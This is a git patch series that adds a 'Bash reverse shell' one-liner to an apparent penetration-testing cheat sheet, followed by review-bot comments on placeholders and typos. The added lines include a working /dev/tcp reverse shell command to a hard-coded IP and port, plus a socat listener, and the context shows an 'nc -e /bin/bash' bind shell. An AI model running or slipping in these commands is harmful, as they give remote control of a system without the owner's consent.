From 2ed0048a28e79db3566bc138b85bedccd21af0c0 Mon Sep 17 00:00:00 2001 From: David Busby Date: Fri, 6 Jun 2014 14:30:16 +0100 Subject: [PATCH 1/3] Bash reverse tcp example in scripting/bash onliner --- scripting/bash.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/scripting/bash.md b/scripting/bash.md index abf1347..3a54e14 100644 --- a/scripting/bash.md +++ b/scripting/bash.md @@ -113,6 +113,20 @@ nc -e /bin/bash -lp *port* cat /proc/cpuinfo ``` +**Bash reverse shell** (@icleus) +Works on all distrobutions where egress filtering is not in place / quiet open, use this to reverse connect to your lsitening host. + +```bash +bash -i>& /dev/tcp/123.123.123.123/1234 0>&1 & +``` + +I find this best works with a socat listener due to the readline support. + +```bash +socat readline TCP-LISTEN:1234 +``` + + Credits ----------- Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions) From c71945966fd8339363da60807ac2e34f6a8237b1 Mon Sep 17 00:00:00 2001 From: David Busby Date: Fri, 6 Jun 2014 16:27:11 +0100 Subject: [PATCH 2/3] typo correction --- scripting/bash.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/scripting/bash.md b/scripting/bash.md index 3a54e14..21b0e41 100644 --- a/scripting/bash.md +++ b/scripting/bash.md @@ -114,7 +114,8 @@ cat /proc/cpuinfo ``` **Bash reverse shell** (@icleus) -Works on all distrobutions where egress filtering is not in place / quiet open, use this to reverse connect to your lsitening host. + +Works on all (recent) distrobutions where egress filtering is not in place / quite open, use this to reverse connect to your listening host. ```bash bash -i>& /dev/tcp/123.123.123.123/1234 0>&1 & From 726f60ce32113fdc074e91881d9e506b8a38763a Mon Sep 17 00:00:00 2001 
From: David Busby Date: Sat, 7 Jun 2014 12:00:10 +0100 Subject: [PATCH 3/3] typo correction --- scripting/bash.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scripting/bash.md b/scripting/bash.md index 21b0e41..d4276fb 100644 --- a/scripting/bash.md +++ b/scripting/bash.md @@ -115,7 +115,7 @@ cat /proc/cpuinfo **Bash reverse shell** (@icleus) -Works on all (recent) distrobutions where egress filtering is not in place / quite open, use this to reverse connect to your listening host. +Works on all (recent) distributions where egress filtering is not in place / quite open, use this to reverse connect to your listening host. ```bash bash -i>& /dev/tcp/123.123.123.123/1234 0>&1 &
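Review bot: in [PATCH 1/3], the added `bash -i>& /dev/tcp/123.123.123.123/1234 0>&1 &` and `socat readline TCP-LISTEN:1234` lines hard-code an address and port, while the context line just above the hunk uses a placeholder (`nc -e /bin/bash -lp *port*`). 123.123.123.123 is a publicly routable address, so suggest the file's existing placeholder style (*host*, *port*) or an RFC 5737 documentation address such as 192.0.2.1. The added prose line also carries typos ("distrobutions", "quiet open", "lsitening"), and there is no blank line between the bold heading and the sentence, so the two render as one paragraph.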
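Review bot: in [PATCH 2/3], the subject says "typo correction" but the replaced line also adds the qualifier "(recent)", which changes the compatibility claim without explanation. Either state in the text what "recent" refers to (which bash version or distribution release) or mention the change in the commit message. The new line still reads "distrobutions", so the typo fix is incomplete in this commit.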
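Review bot: [PATCH 3/3] corrects "distributions" only; the replaced sentence still reads "not in place / quite open, use this to reverse connect", a comma splice with an ambiguous slash. Suggest splitting it, for example "Works on all (recent) distributions where egress filtering is absent or permissive. Use this to reverse connect to your listening host." Patches 2/3 and 3/3 only touch the paragraph introduced in 1/3, so squash them into that commit before merging.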